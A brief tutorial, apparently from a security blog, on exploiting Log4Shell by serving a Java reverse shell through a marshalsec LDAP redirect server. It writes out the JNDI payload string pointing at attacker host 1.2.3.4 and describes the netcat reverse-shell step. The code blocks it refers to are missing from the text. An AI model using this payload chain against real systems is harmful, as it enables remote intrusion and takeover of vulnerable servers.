Reverse shell
A simple Java exploit that pops a reverse shell (at least on Linux systems with a version of netcat that supports the -e
switch) is:
Where 1.2.3.4 is the IP you’re catching the reverse shell at and 9999 is the port of the listener. This can be compiled with:
Note that the -source
and -target
flags may need to be modified depending on which version of Java the target is running. As with all things Java, the file name and file class name need to match.
Delivery with Log4Shell
Delivery through a vulnerable version of Log4j is done through a four step process: Malicious string → LDAP lookup → load Java code over HTTP → reverse shell.
A simple Java LDAP server that will handle redirects is available at https://github.com/mbechler/marshalsec. It can be built with Apache Maven using the version of OpenJDK supplied with Kali Linux:
Then run with:
Where $ATTACKER_IP
and $ATTACKER_PORT
are the IP address and port of an HTTP server that will be used to actually serve up the exploit.
Once that’s done you’ll just need to fire up a quick web server to serve appropriate exploit code (like the example reverse shell above) and a netcat listener, and then find a way to deliver the malicious string (${jndi:ldap://1.2.3.4:1389/Exploit}
, where 1.2.3.4 is the $ATTACKER_IP
above) somewhere it will be logged.
Note that a number of other protocols are supported besides LDAP (the marchalsec server supports a few).